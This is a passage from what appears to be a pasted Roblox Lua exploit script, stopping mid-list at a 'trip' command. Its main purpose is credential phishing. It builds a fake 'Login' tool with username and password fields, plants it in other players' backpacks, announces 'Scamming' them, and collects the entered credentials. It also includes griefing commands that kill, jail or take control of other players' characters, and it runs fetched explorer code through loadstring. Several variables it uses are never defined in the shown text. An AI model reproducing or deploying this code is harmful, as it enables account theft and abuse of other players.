  619. NewGuiPart50.Position = UDim2.new(0, 0, 0, 50)
  620. NewGuiPart50.Size = UDim2.new(0, 290, 0, 280)
  621. NewGuiPart50.Visible = false
  622. NewGuiPart50.ClipsDescendants = true
  623. NewGuiPart50.Draggable = true
  624. NewGuiPart50.Parent = NewGuiPart2
  625.  
  626. -------
  627. local NewGuiPart52 = Instance.new("TextBox")
  628. NewGuiPart52.Active = false
  629. NewGuiPart52.BackgroundTransparency = 0.5
  630. NewGuiPart52.BorderColor3 = Color3.new(0, 0, 0)
  631. NewGuiPart52.BorderSizePixel = 0
  632. NewGuiPart52.Name = "TB1"
  633. NewGuiPart52.Position = UDim2.new(0, 90, 0, 100)
  634. NewGuiPart52.Size = UDim2.new(0, 180, 0, 20)
  635. NewGuiPart52.FontSize = Enum.FontSize.Size18
  636. NewGuiPart52.Text = ""
  637. NewGuiPart52.TextColor3 = Color3.new(1, 1, 1)
  638. NewGuiPart52.TextWrapped = true
  639. NewGuiPart52.Parent = NewGuiPart50
  640. -------
  641. local NewGuiPart53 = Instance.new("TextButton")
  642. NewGuiPart53.BackgroundColor3 = Color3.new(0.972549, 0.972549, 0.972549)
  643. NewGuiPart53.BackgroundTransparency = 0.5
  644. NewGuiPart53.BorderColor3 = Color3.new(0, 0, 0)
  645. NewGuiPart53.BorderSizePixel = 0
  646. NewGuiPart53.Name = "TB"
  647. NewGuiPart53.Position = UDim2.new(0, 50, 0, 250)
  648. NewGuiPart53.Selectable = true
  649. NewGuiPart53.Size = UDim2.new(0, 180, 0, 20)
  650. NewGuiPart53.Style = Enum.ButtonStyle.Custom
  651. NewGuiPart53.FontSize = Enum.FontSize.Size18
  652. NewGuiPart53.Text = "Save"
  653. NewGuiPart53.TextColor3 = Color3.new(0, 0, 0)
  654. NewGuiPart53.TextWrapped = true
  655. NewGuiPart53.Parent = NewGuiPart50
  656.  
  657. -------
  658. local NewGuiPart55 = Instance.new("TextLabel")
  659. NewGuiPart55.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  660. NewGuiPart55.BackgroundTransparency = 1
  661. NewGuiPart55.BorderColor3 = Color3.new(0, 0, 0)
  662. NewGuiPart55.BorderSizePixel = 0
  663. NewGuiPart55.Name = "TL2"
  664. NewGuiPart55.Position = UDim2.new(0, 0, 0, 100)
  665. NewGuiPart55.Size = UDim2.new(0, 80, 0, 20)
  666. NewGuiPart55.FontSize = Enum.FontSize.Size18
  667. NewGuiPart55.Text = "Tool Name"
  668. NewGuiPart55.TextColor3 = Color3.new(1, 1, 1)
  669. NewGuiPart55.TextWrapped = true
  670. NewGuiPart55.Parent = NewGuiPart50
  671. -------
  672. local NewGuiPart56 = Instance.new("TextButton")
  673. NewGuiPart56.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  674. NewGuiPart56.BackgroundTransparency = 0.69999998807907
  675. NewGuiPart56.BorderColor3 = Color3.new(0, 0, 0)
  676. NewGuiPart56.BorderSizePixel = 0
  677. NewGuiPart56.Name = "TL4"
  678. NewGuiPart56.Position = UDim2.new(0, 200, 0, 50)
  679. NewGuiPart56.Selectable = true
  680. NewGuiPart56.Size = UDim2.new(0, 80, 0, 20)
  681. NewGuiPart56.Style = Enum.ButtonStyle.Custom
  682. NewGuiPart56.FontSize = Enum.FontSize.Size14
  683. NewGuiPart56.Text = "CMD"
  684. NewGuiPart56.TextColor3 = Color3.new(1, 1, 1)
  685. NewGuiPart56.Parent = NewGuiPart2
  686. -------
  687. local NewGuiPart57 = Instance.new("Frame")
  688. NewGuiPart57.BackgroundTransparency = 1
  689. NewGuiPart57.Name = "ChatBox"
  690. NewGuiPart57.Position = UDim2.new(0, 20, 0, -25)
  691. NewGuiPart57.Size = UDim2.new(0, 245, 0, 400)
  692. NewGuiPart57.Visible = false
  693. NewGuiPart57.Draggable = true
  694. NewGuiPart57.Parent = NewGuiPart2
  695. -------
  696. local NewGuiPart58 = Instance.new("TextButton")
  697. NewGuiPart58.Active = true
  698. NewGuiPart58.BackgroundTransparency = 0.5
  699. NewGuiPart58.BorderSizePixel = 0
  700. NewGuiPart58.Name = "Chat"
  701. NewGuiPart58.Position = UDim2.new(0, 180, 0, 310)
  702. NewGuiPart58.Selectable = true
  703. NewGuiPart58.Size = UDim2.new(0, 65, 0, 50)
  704. NewGuiPart58.Style = Enum.ButtonStyle.Custom
  705. NewGuiPart58.FontSize = Enum.FontSize.Size14
  706. NewGuiPart58.Text = "Chat"
  707. NewGuiPart58.Parent = NewGuiPart57
  708. -------
  709. local NewGuiPart59 = Instance.new("TextLabel")
  710. NewGuiPart59.BackgroundTransparency = 0.5
  711. NewGuiPart59.BorderSizePixel = 0
  712. NewGuiPart59.Name = "Output"
  713. NewGuiPart59.Position = UDim2.new(0, 0, 0, 100)
  714. NewGuiPart59.Size = UDim2.new(0, 245, 0, 200)
  715. NewGuiPart59.Font = Enum.Font.Legacy
  716. NewGuiPart59.FontSize = Enum.FontSize.Size14
  717. NewGuiPart59.Text = ""
  718. NewGuiPart59.TextWrapped = true
  719. NewGuiPart59.Parent = NewGuiPart57
  720. -------
  721. local NewGuiPart60 = Instance.new("TextBox")
  722. NewGuiPart60.BackgroundTransparency = 0.5
  723. NewGuiPart60.Name = "Input"
  724. NewGuiPart60.Position = UDim2.new(0, 0, 0, 310)
  725. NewGuiPart60.Size = UDim2.new(0, 165, 0, 50)
  726. NewGuiPart60.FontSize = Enum.FontSize.Size28
  727. NewGuiPart60.Text = ""
  728. NewGuiPart60.Parent = NewGuiPart57
  729. -------
  730. local NewGuiPart61 = Instance.new("Frame")
  731. NewGuiPart61.BackgroundTransparency = 1
  732. NewGuiPart61.Name = "CMDS"
  733. NewGuiPart61.Position = UDim2.new(0, 20, 0, -25)
  734. NewGuiPart61.Size = UDim2.new(0, 245, 0, 400)
  735. NewGuiPart61.Visible = false
  736. NewGuiPart61.Draggable = true
  737. NewGuiPart61.Parent = NewGuiPart2
  738. -------
  739. local NewGuiPart62 = Instance.new("TextButton")
  740. NewGuiPart62.Active = true
  741. NewGuiPart62.BackgroundTransparency = 0.5
  742. NewGuiPart62.BorderSizePixel = 0
  743. NewGuiPart62.Name = "Execute"
  744. NewGuiPart62.Position = UDim2.new(0, 180, 0, 310)
  745. NewGuiPart62.Selectable = true
  746. NewGuiPart62.Size = UDim2.new(0, 65, 0, 50)
  747. NewGuiPart62.Style = Enum.ButtonStyle.Custom
  748. NewGuiPart62.FontSize = Enum.FontSize.Size12
  749. NewGuiPart62.Text = "Execute"
  750. NewGuiPart62.Parent = NewGuiPart61
  751. -------
  752. local NewGuiPart63 = Instance.new("TextLabel")
  753. NewGuiPart63.BackgroundTransparency = 0.5
  754. NewGuiPart63.BorderSizePixel = 0
  755. NewGuiPart63.Name = "Output"
  756. NewGuiPart63.Position = UDim2.new(0, 0, 0, 100)
  757. NewGuiPart63.Size = UDim2.new(0, 245, 0, 200)
  758. NewGuiPart63.Font = Enum.Font.Legacy
  759. NewGuiPart63.FontSize = Enum.FontSize.Size14
  760. NewGuiPart63.Text = ""
  761. NewGuiPart63.TextWrapped = true
  762. NewGuiPart63.Parent = NewGuiPart61
  763. -------
  764. local NewGuiPart64 = Instance.new("TextBox")
  765. NewGuiPart64.BackgroundTransparency = 0.5
  766. NewGuiPart64.Name = "CmdInput"
  767. NewGuiPart64.Position = UDim2.new(0, 0, 0, 310)
  768. NewGuiPart64.Size = UDim2.new(0, 165, 0, 50)
  769. NewGuiPart64.FontSize = Enum.FontSize.Size14
  770. NewGuiPart64.Text = ""
  771. NewGuiPart64.Parent = NewGuiPart61
  772.  
  773. local IsRunning = Instance.new("BoolValue")
  774. IsRunning.Value = false
  775. IsRunning.Name = "IsRunning"
  776. IsRunning.Parent = NewGuiPart2
  777.  
  778. local Login = Instance.new("Tool")
  779. Login.CanBeDropped = false
  780. Login.ManualActivationOnly = false
  781. Login.RequiresHandle = false
  782. Login.Name = "Login"
  783. Login.Parent = NewGuiPart1
  784.  
  785. local ToolName = Instance.new("StringValue")
  786. ToolName.Value = "Login"
  787. ToolName.Parent = CoreValues
  788. ToolName.Name = "ToolName"
  789.  
  790.  
  791. local NewGuiPart65 = Instance.new("ScreenGui")
  792. NewGuiPart65.Name = "LoginGui"
  793. NewGuiPart65.Parent = Login
  794. -------
  795. local NewGuiPart66 = Instance.new("Frame")
  796. NewGuiPart66.Name = "ErrorFrame"
  797. NewGuiPart66.Size = UDim2.new(1, 0, 1, 0)
  798. NewGuiPart66.Visible = false
  799. NewGuiPart66.Parent = NewGuiPart65
  800. -------
  801. local NewGuiPart67 = Instance.new("ImageLabel")
  802. NewGuiPart67.Active = false
  803. NewGuiPart67.Selectable = false
  804. NewGuiPart67.Size = UDim2.new(1, 0, 1, 0)
  805. NewGuiPart67.Image = "rbxassetid://423929933"
  806. NewGuiPart67.Parent = NewGuiPart66
  807. -------
  808. local NewGuiPart69 = Instance.new("TextLabel")
  809. NewGuiPart69.BackgroundTransparency = 1
  810. NewGuiPart69.BorderSizePixel = 0
  811. NewGuiPart69.Name = "UserName"
  812. NewGuiPart69.Position = UDim2.new(0, 50, 0.5, 0)
  813. NewGuiPart69.Size = UDim2.new(0, 100, 0, 50)
  814. NewGuiPart69.Font = Enum.Font.Legacy
  815. NewGuiPart69.FontSize = Enum.FontSize.Size14
  816. NewGuiPart69.Text = "UserName"
  817. NewGuiPart69.Parent = NewGuiPart66
  818. -------
  819. local NewGuiPart70 = Instance.new("TextLabel")
  820. NewGuiPart70.BackgroundTransparency = 1
  821. NewGuiPart70.BorderSizePixel = 0
  822. NewGuiPart70.Name = "Password"
  823. NewGuiPart70.Position = UDim2.new(0, 50, 0.5, 50)
  824. NewGuiPart70.Size = UDim2.new(0, 100, 0, 50)
  825. NewGuiPart70.Font = Enum.Font.Legacy
  826. NewGuiPart70.FontSize = Enum.FontSize.Size14
  827. NewGuiPart70.Text = "Password"
  828. NewGuiPart70.Parent = NewGuiPart66
  829. -------
  830. local NewGuiPart71 = Instance.new("TextBox")
  831. NewGuiPart71.BackgroundColor3 = Color3.new(255,255,255)
  832. NewGuiPart71.BorderColor3 = Color3.new(0, 0, 0)
  833. NewGuiPart71.BorderSizePixel = 2
  834. NewGuiPart71.Name = "TB2"
  835. NewGuiPart71.Position = UDim2.new(0, 160, 0.5, 65)
  836. NewGuiPart71.Size = UDim2.new(0, 200, 0, 20)
  837. NewGuiPart71.Font = Enum.Font.Legacy
  838. NewGuiPart71.FontSize = Enum.FontSize.Size14
  839. NewGuiPart71.Text = ""
  840. NewGuiPart71.Parent = NewGuiPart66
  841. -------
  842. local NewGuiPart72 = Instance.new("ImageButton")
  843. NewGuiPart72.Active = true
  844. NewGuiPart71.BackgroundColor3 = Color3.new(73,123,255)
  845. NewGuiPart72.BackgroundTransparency = 0.5
  846. NewGuiPart72.Name = "LoginButton"
  847. NewGuiPart72.Position = UDim2.new(0, 90, 0.5, 150)
  848. NewGuiPart72.Selectable = true
  849. NewGuiPart72.Size = UDim2.new(0, 280, 0, 25)
  850. NewGuiPart72.Style = Enum.ButtonStyle.RobloxRoundButton
  851. NewGuiPart72.Visible = true
  852. NewGuiPart72.Image = "rbxassetid://431070395"
  853. NewGuiPart72.Parent = NewGuiPart66
  854. -------
  855. local NewGuiPart73 = Instance.new("TextLabel")
  856. NewGuiPart73.BackgroundColor3 = Color3.new(255,255,255)
  857. NewGuiPart73.BorderColor3 = Color3.new(0, 0, 0)
  858. NewGuiPart73.BorderSizePixel = 0
  859. NewGuiPart73.Name = "TB1"
  860. NewGuiPart73.Position = UDim2.new(0, 160, 0.5, 15)
  861. NewGuiPart73.Size = UDim2.new(0, 200, 0, 20)
  862. NewGuiPart73.Font = Enum.Font.Legacy
  863. NewGuiPart73.FontSize = Enum.FontSize.Size14
  864. NewGuiPart73.Text = ""
  865. NewGuiPart73.Parent = NewGuiPart66
  866.  
  867.  
  868. local Textg = Instance.new("TextLabel")
  869. Textg.BackgroundColor3 = Color3.new(255,255,255)
  870. Textg.BorderColor3 = Color3.new(0, 0, 0)
  871. Textg.BorderSizePixel = 0
  872. Textg.Name = "Text"
  873. Textg.Position = UDim2.new(0, 90, 0.5,115)
  874. Textg.Size = UDim2.new(0, 200, 0, 20)
  875. Textg.Font = Enum.Font.Legacy
  876. Textg.FontSize = Enum.FontSize.Size14
  877. Textg.Text = ""
  878. Textg.Parent = NewGuiPart66
  879.  
  880. local Done = Instance.new("BoolValue")
  881. Done.Name = "Done"
  882. Done.Value = false
  883. Done.Parent = NewGuiPart66
  884.  
  885. local Folderr = Instance.new("Folder")
  886. Folderr.Parent = CoreValues
  887. Folderr.Name = "Folder"
  888.  
  889.  
  890. local UserName = Instance.new("StringValue")
  891. UserName.Name = "UserName"
  892. UserName.Parent = Folderr
  893.  
  894. local PassWord = Instance.new("StringValue")
  895. PassWord.Name = "Password"
  896. PassWord.Parent = Folderr
  897.  
  898.  
  899.  
  900. local UsingTool = Instance.new("BoolValue")
  901. UsingTool.Parent = CoreValues
  902. UsingTool.Name = "UsingTool"
  903. UsingTool.Value = true
  904.  
  905. NewGuiPart1:Clone().Parent = CoreValues
  906. NewGuiPart65:Clone().Parent = CoreValues
  907.  
  908.  
  909.  
  910. print("MGVX LIB Running")
  911. local Lib = Instance.new("Folder")
  912. Lib.Name = "ACCOUNTLIB"
  913. Lib.Parent = CoreValues
  914.  
  915. if PassWord.Value ~= nil and UserName.Value ~= nil then
  916. namer = Instance.new("Folder")
  917. namer.Parent = Lib
  918. namer.Name = UserName.Value
  919. old = PassWord:Clone()
  920. old.Parent = namer
  921. old.Name = UserName.Value
  922. oldu = UserName:Clone()
  923. oldu.Parent = namer
  924. oldu.Name = UserName.Value
  925. new = PassWord:Clone()
  926. new.Value = ""
  927. new.Name = "PassWord"
  928. new.Parent = Folderr
  929. newu = UserName:Clone()
  930. newu.Value = ""
  931. newu.Name = "UserName"
  932. newu.Parent = Folderr
  933. UserName:Destroy();
  934. PassWord:Destroy();
  935. end
  936.  
  937. --------------FUNCTIONS---------------
  938. local NumofPlayers = game:GetService("Players").NumPlayers
  939. local NumOfPlayersBeingScammed = NumofPlayers-1
  940. local DoneBeingScammed = {}
  941.  
  942.  
  943.  
  944.  
  945.  
  946.  
  947. function Clicked4()
  948.  
  949. if NewGuiPart52.Text ~= nil then
  950. Login.Name = NewGuiPart52.Text
  951. ToolName.Value = NewGuiPart52.Text
  952. end
  953.  
  954. if NewGuiPart52.Text == nil then
  955. Login.Name = "Login"
  956. ToolName.Value = "Login"
  957. end
  958.  
  959.  
  960.  
  961.  
  962. NewGuiPart50.Visible = false
  963.  
  964. end
  965.  
  966.  
  967.  
  968. function Click()
  969. local ppl = game.Players:GetChildren()
  970. local spots = NewGuiPart6:children()
  971. for i = 1,#ppl do
  972. spots[i].Visible = true
  973. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  974. spots[i].TextLabel.Text = ppl[i].Name
  975. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  976. spots[i].TextLabel.Text = ''
  977. spots[i].ImageLabel.Image = ''
  978. end
  979. end
  980. end
  981. function Clicked()
  982. otherp.Backpack:GetChildren().Parent = workspace
  983.  
  984.  
  985. if UsingTool.Value == true then
  986. Login:Clone().Parent = otherp.Backpack
  987. NewGuiPart4.Text = "Scanning..."
  988. print("Scamming ".. NumOfPlayersBeingScammed .. " Players!")
  989. NewGuiPart50.Visible = false
  990. NewGuiPart61.Visible = false
  991. NewGuiPart5.Visible = true
  992. IsRunning.Value = true
  993. Owner.Backpack:WaitForChild(ToolName.Value):Destroy();
  994. end
  995. end
  996.  
  997.  
  998.  
  999. function Clicked1()
  1000. NewGuiPart5.Visible = false
  1001. NewGuiPart61.Visible = false
  1002. NewGuiPart50.Visible = true
  1003. end
  1004.  
  1005. function Clicked2()
  1006. NewGuiPart5.Visible = false
  1007. NewGuiPart50.Visible = false
  1008. NewGuiPart61.Visible = true
  1009. end
  1010.  
  1011.  
  1012. plrrr = game.Players.LocalPlayer
  1013. plrr = game.Players:GetChildren()
  1014. Input = NewGuiPart64
  1015. Exe = NewGuiPart62
  1016. Output = NewGuiPart63
  1017. Output.Text = "Welcome, "..plrrr.Name.."."
  1018.  
  1019.  
  1020. game.Players.PlayerAdded:connect(function()
  1021. local ppl = game.Players:GetChildren()
  1022. local spots = NewGuiPart6:children()
  1023. for i = 1,#ppl do
  1024. spots[i].Visible = true
  1025. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1026. spots[i].TextLabel.Text = ppl[i].Name
  1027. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1028. spots[i].TextLabel.Text = ''
  1029. spots[i].ImageLabel.Image = ''
  1030. end
  1031.  
  1032. end
  1033. end)
  1034.  
  1035. game.Players.PlayerRemoving:connect(function()
  1036. local ppl = game.Players:GetChildren()
  1037. local spots = NewGuiPart6:children()
  1038. for i = 1,#ppl do
  1039. spots[i].Visible = true
  1040. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1041. spots[i].TextLabel.Text = ppl[i].Name
  1042. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1043. spots[i].TextLabel.Text = ''
  1044. spots[i].ImageLabel.Image = ''
  1045. end
  1046.  
  1047. end
  1048. end)
  1049.  
  1050.  
  1051. function Clicked3(arg)
  1052. local Cmd = Input
  1053. local allp = game.Players:GetChildren()
  1054. local numb;
  1055. local pp;
  1056. local p;
  1057. local num;
  1058. local argus = {"me", "all",numb,plrr}
  1059.  
  1060. if Cmd.Text:sub(1, 12) == "viewExplorer" then
  1061. local guu = game:GetObjects("rbxassetid://418955355")[1] guu.Parent = game.CoreGui
  1062. guu.ExplorerPanel.LocalScript.Source = string.gsub(guu.ExplorerPanel.LocalScript.Source,"script.Parent","game.CoreGui.Dex.ExplorerPanel")
  1063. guu.PropertiesFrame.Properties.Source = string.gsub(guu.PropertiesFrame.Properties.Source,"script.Parent.Parent","game.CoreGui.Dex")
  1064. guu.Selection.Source = string.gsub(guu.Selection.Source,"script.Parent","game.CoreGui.Dex")
  1065.  
  1066. spawn(function()
  1067. loadstring(guu.ExplorerPanel.LocalScript.Source)()
  1068. end)
  1069. spawn(function()
  1070. loadstring(guu.PropertiesFrame.Properties.Source)()
  1071. end)
  1072. spawn(function()
  1073. loadstring(guu.Selection.Source)()
  1074. end)
  1075.  
  1076.  
  1077.  
  1078. elseif Cmd.Text:sub(1,13) == "closeExplorer" then
  1079. game.CoreGui.Dex:Destroy()
  1080. end
  1081.  
  1082. if Cmd.Text:lower():sub(1,4) == "hat " then
  1083. local chk1 = Cmd.Text:lower():sub(5):find(" ") + 4
  1084. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5, chk1-1))
  1085. for i, v in pairs(plrz) do
  1086. coroutine.resume(coroutine.create(function()
  1087. if v and v.Character then
  1088. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1089. for a,hat in pairs(obj:children()) do if hat:IsA("Hat") then hat.Parent = v.Character end end
  1090. obj:Destroy()
  1091. end
  1092. end))
  1093. end
  1094. end
  1095.  
  1096. if Cmd.Text:lower():sub(1,5) == "cape " then
  1097. local chk1 = Cmd.Text:lower():sub(6):find(" ")
  1098. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1099. local str = "torso.BrickColor"
  1100. if chk1 then chk1 = chk1 + 5 plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1101. local teststr = [[BrickColor.new("]]..Cmd.Text:sub(chk1+1,chk1+1):upper()..Cmd.Text:sub(chk1+2):lower()..[[")]]
  1102. if Cmd.Text:sub(chk1+1):lower() == "new yeller" then teststr = [[BrickColor.new("New Yeller")]] end
  1103. if Cmd.Text:sub(chk1+1):lower() == "pastel blue" then teststr = [[BrickColor.new("Pastel Blue")]] end
  1104. if Cmd.Text:sub(chk1+1):lower() == "dusty rose" then teststr = [[BrickColor.new("Dusty Rose")]] end
  1105. if Cmd.Text:sub(chk1+1):lower() == "cga brown" then teststr = [[BrickColor.new("CGA brown")]] end
  1106. if Cmd.Text:sub(chk1+1):lower() == "random" then teststr = [[BrickColor.random()]] end
  1107. if Cmd.Text:sub(chk1+1):lower() == "shiny" then teststr = [[BrickColor.new("Institutional white") p.Reflectance = 1]] end
  1108. if Cmd.Text:sub(chk1+1):lower() == "gold" then teststr = [[BrickColor.new("Bright yellow") p.Reflectance = .4]] end
  1109. if Cmd.Text:sub(chk1+1):lower() == "kohl" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597653"]] end
  1110. if Cmd.Text:sub(chk1+1):lower() == "batman" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597669"]] end
  1111. if Cmd.Text:sub(chk1+1):lower() == "superman" then teststr = [[BrickColor.new("Bright blue") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597677"]] end
  1112. if Cmd.Text:sub(chk1+1):lower() == "swag" then teststr = [[BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474"]] end
  1113. if BrickColor.new(teststr) ~= nil then str = teststr end
  1114. end
  1115. for i, v in pairs(plrz) do
  1116. coroutine.resume(coroutine.create(function()
  1117. if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") then
  1118. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1119. local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  1120. repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  1121. local torso = plr.Character.Torso
  1122. local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  1123. p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = ]]..str..[[ p.formFactor = "Custom"
  1124. p.Size = Vector3.new(.2,.2,.2)
  1125. local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  1126. local motor1 = Instance.new("Motor", p)
  1127. motor1.Part0 = p
  1128. motor1.Part1 = torso
  1129. motor1.MaxVelocity = .01
  1130. motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  1131. motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  1132. local wave = false
  1133. repeat wait(1/44)
  1134. local ang = 0.1
  1135. local oldmag = torso.Velocity.magnitude
  1136. local mv = .002
  1137. if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  1138. ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  1139. motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  1140. motor1.DesiredAngle = -ang
  1141. if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  1142. repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  1143. if torso.Velocity.magnitude < .1 then wait(.1) end
  1144. until not p or p.Parent ~= torso.Parent
  1145. script:Destroy()
  1146. ]] cl.Parent = v.PlayerGui cl.Disabled = false
  1147. end
  1148. end))
  1149. end
  1150. end
  1151.  
  1152. if Cmd.Text:lower():sub(1,7) == "uncape " then
  1153. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1154. for i, v in pairs(plrz) do
  1155. coroutine.resume(coroutine.create(function()
  1156. if v and v:findFirstChild("PlayerGui") and v.Character then
  1157. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1158. end
  1159. end))
  1160. end
  1161. end
  1162.  
  1163.  
  1164. if Cmd.Text:lower():sub(1,5) == "jail " then
  1165. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1166. for i, v in pairs(plrz) do
  1167. coroutine.resume(coroutine.create(function()
  1168. if v and v.Character and v.Character:findFirstChild("Torso") then
  1169. local vname = v.Name
  1170. local cf = v.Character.Torso.CFrame + Vector3.new(0,1,0)
  1171. local mod = Instance.new("Model", game.Workspace) mod.Name = v.Name .. " Jail"
  1172. local top = Instance.new("Part", mod) top.Locked = true top.formFactor = "Symmetric" top.Size = Vector3.new(6,1,6) top.TopSurface = 0 top.BottomSurface = 0 top.Anchored = true top.BrickColor = BrickColor.new("Really black") top.CFrame = cf * CFrame.new(0,-3.5,0)
  1173. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1174. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1175. game.Players.PlayerAdded:connect(function(plr) if plr.Name == vname then v = plr end
  1176. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1177. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1178. end)
  1179. local bottom = top:Clone() bottom.Parent = mod bottom.CFrame = cf * CFrame.new(0,3.5,0)
  1180. local front = top:Clone() front.Transparency = .5 front.Reflectance = .1 front.Parent = mod front.Size = Vector3.new(6,6,1) front.CFrame = cf * CFrame.new(0,0,-3)
  1181. local back = front:Clone() back.Parent = mod back.CFrame = cf * CFrame.new(0,0,3)
  1182. local right = front:Clone() right.Parent = mod right.Size = Vector3.new(1,6,6) right.CFrame = cf * CFrame.new(3,0,0)
  1183. local left = right:Clone() left.Parent = mod left.CFrame = cf * CFrame.new(-3,0,0)
  1184. local msh = Instance.new("BlockMesh", front) msh.Scale = Vector3.new(1,1,0)
  1185. local msh2 = msh:Clone() msh2.Parent = back
  1186. local msh3 = msh:Clone() msh3.Parent = right msh3.Scale = Vector3.new(0,1,1)
  1187. local msh4 = msh3:Clone() msh4.Parent = left
  1188. v.Character.Torso.CFrame = cf
  1189. end
  1190. end))
  1191. end
  1192. end
  1193.  
  1194. if Cmd.Text:lower():sub(1,7) == "unjail " then
  1195. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1196. for i, v in pairs(plrz) do coroutine.resume(coroutine.create(function() if v then for a, jl in pairs(game.Workspace:children()) do if jl.Name == v.Name .. " Jail" then jl:Destroy() end end end end)) end
  1197. end
  1198.  
  1199.  
  1200.  
  1201. if Cmd.Text:lower():sub(1,8) == "control " then
  1202. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1203. for i, v in pairs(plrz) do
  1204. coroutine.resume(coroutine.create(function()
  1205. if v and v.Character then
  1206. v.Character.Humanoid.PlatformStand = true
  1207. local w = Instance.new("Weld", plr.Character.Torso )
  1208. w.Part0 = plr.Character.Torso
  1209. w.Part1 = v.Character.Torso
  1210. local w2 = Instance.new("Weld", plr.Character.Head)
  1211. w2.Part0 = plr.Character.Head
  1212. w2.Part1 = v.Character.Head
  1213. local w3 = Instance.new("Weld", plr.Character:findFirstChild("Right Arm"))
  1214. w3.Part0 = plr.Character:findFirstChild("Right Arm")
  1215. w3.Part1 = v.Character:findFirstChild("Right Arm")
  1216. local w4 = Instance.new("Weld", plr.Character:findFirstChild("Left Arm"))
  1217. w4.Part0 = plr.Character:findFirstChild("Left Arm")
  1218. w4.Part1 = v.Character:findFirstChild("Left Arm")
  1219. local w5 = Instance.new("Weld", plr.Character:findFirstChild("Right Leg"))
  1220. w5.Part0 = plr.Character:findFirstChild("Right Leg")
  1221. w5.Part1 = v.Character:findFirstChild("Right Leg")
  1222. local w6 = Instance.new("Weld", plr.Character:findFirstChild("Left Leg"))
  1223. w6.Part0 = plr.Character:findFirstChild("Left Leg")
  1224. w6.Part1 = v.Character:findFirstChild("Left Leg")
  1225. plr.Character.Head.face:Destroy()
  1226. for i, p in pairs(v.Character:children()) do
  1227. if p:IsA("BasePart") then
  1228. p.CanCollide = false
  1229. end
  1230. end
  1231. for i, p in pairs(plr.Character:children()) do
  1232. if p:IsA("BasePart") then
  1233. p.Transparency = 1
  1234. elseif p:IsA("Hat") then
  1235. p:Destroy()
  1236. end
  1237. end
  1238. v.Character.Parent = plr.Character
  1239. v.Character.Humanoid.Changed:connect(function() v.Character.Humanoid.PlatformStand = true end)
  1240. end
  1241. end))
  1242. end
  1243. end
  1244.  
  1245. if Cmd.Text:lower():sub(1,5) == "kill " then
  1246. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1247. for i, v in pairs(plrz) do
  1248. coroutine.resume(coroutine.create(function()
  1249. if v and v.Character then v.Character:BreakJoints() end
  1250. end))
  1251. end
  1252. end
  1253.  
  1254.  
  1255.  
  1256. if Cmd.Text:lower():sub(1,5) == "trip " then
